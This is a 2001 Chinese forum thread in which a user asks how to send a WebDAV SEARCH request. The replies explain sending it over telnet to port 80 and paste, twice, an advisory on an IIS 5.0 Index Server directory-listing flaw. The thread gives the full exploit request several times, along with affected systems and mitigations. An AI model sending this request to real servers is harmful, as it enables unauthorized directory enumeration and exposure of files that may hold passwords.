28,406
社区成员
发帖
与我相关
我的任务
分享发送请求给服务器的语法
发送如下的请求给服务器:
SEARCH / HTTP/1.1
Host: target
Content-Type: text/xml
Content-Length: 133
<?xml version="1.0"?>
<g:searchrequest xmlns:g="DAV:">
<g:sql>
Select "DAV:displayname" from scope()
</g:sql>
</g:searchrequest>
这个请求怎么发送?
SEARCH / HTTP/1.1
Host: target
Content-Type: text/xml
Content-Length: 133
<?xml version="1.0"?>
<g:searchrequest xmlns:g="DAV:">
<g:sql>
Select "DAV:displayname" from scope()
</g:sql>
</g:searchrequest>
这个请求怎么发送?
...全文
请发表友善的回复…
发表回复
julyclyde 2001-11-16
- 打赏
- 举报
telnet到80端口,一句一句粘贴过去在最后两个回车就可以了
jediknight 2001-11-16
- 打赏
- 举报
全文如下
在IIS 5.0下非法获得目录列表漏洞
在IIS 5.0下非法获得目录列表漏洞 (MS,缺陷)
涉及程序:
IIS 5.0
描述:
在IIS 5.0下非法获得目录列表漏洞
详细:
通常在默认情况下IIS 5.0中的Index Server是被禁止的,如果激活了Index Server,远程用户就可能利用WebDAV的查找功
能中的一个缺陷,可以查看到整个root目录的结构以及所有子目录。该漏洞将会暴露一般不会在网站界面直接读取的文档
(包括隐藏目录、包含文件 *.inc等等)
例如发送如下的请求给服务器:
SEARCH / HTTP/1.1
Host: target
Content-Type: text/xml
Content-Length: 133
<?xml version="1.0"?>
<g:searchrequest xmlns:g="DAV:">
<g:sql>
Select "DAV:displayname" from scope()
</g:sql>
</g:searchrequest>
恶意用户如果有效利用该漏洞将有可能查找到暴露用户名和密码等敏感信息的文件。该漏洞只影响设置了“Index”属性的
目录。
受影响的系统:
Microsoft Windows NT
Microsoft Windows 2000
解决方案:
1)如果您不需要使用Index Server,禁止或卸载该服务。
2)如果你使用了Index Server,请将包含敏感信息的目录的“Index this resource”的选项禁止。
在IIS 5.0下非法获得目录列表漏洞
在IIS 5.0下非法获得目录列表漏洞 (MS,缺陷)
涉及程序:
IIS 5.0
描述:
在IIS 5.0下非法获得目录列表漏洞
详细:
通常在默认情况下IIS 5.0中的Index Server是被禁止的,如果激活了Index Server,远程用户就可能利用WebDAV的查找功
能中的一个缺陷,可以查看到整个root目录的结构以及所有子目录。该漏洞将会暴露一般不会在网站界面直接读取的文档
(包括隐藏目录、包含文件 *.inc等等)
例如发送如下的请求给服务器:
SEARCH / HTTP/1.1
Host: target
Content-Type: text/xml
Content-Length: 133
<?xml version="1.0"?>
<g:searchrequest xmlns:g="DAV:">
<g:sql>
Select "DAV:displayname" from scope()
</g:sql>
</g:searchrequest>
恶意用户如果有效利用该漏洞将有可能查找到暴露用户名和密码等敏感信息的文件。该漏洞只影响设置了“Index”属性的
目录。
受影响的系统:
Microsoft Windows NT
Microsoft Windows 2000
解决方案:
1)如果您不需要使用Index Server,禁止或卸载该服务。
2)如果你使用了Index Server,请将包含敏感信息的目录的“Index this resource”的选项禁止。
karma 2001-11-16
- 打赏
- 举报
SEARCH? not POST?
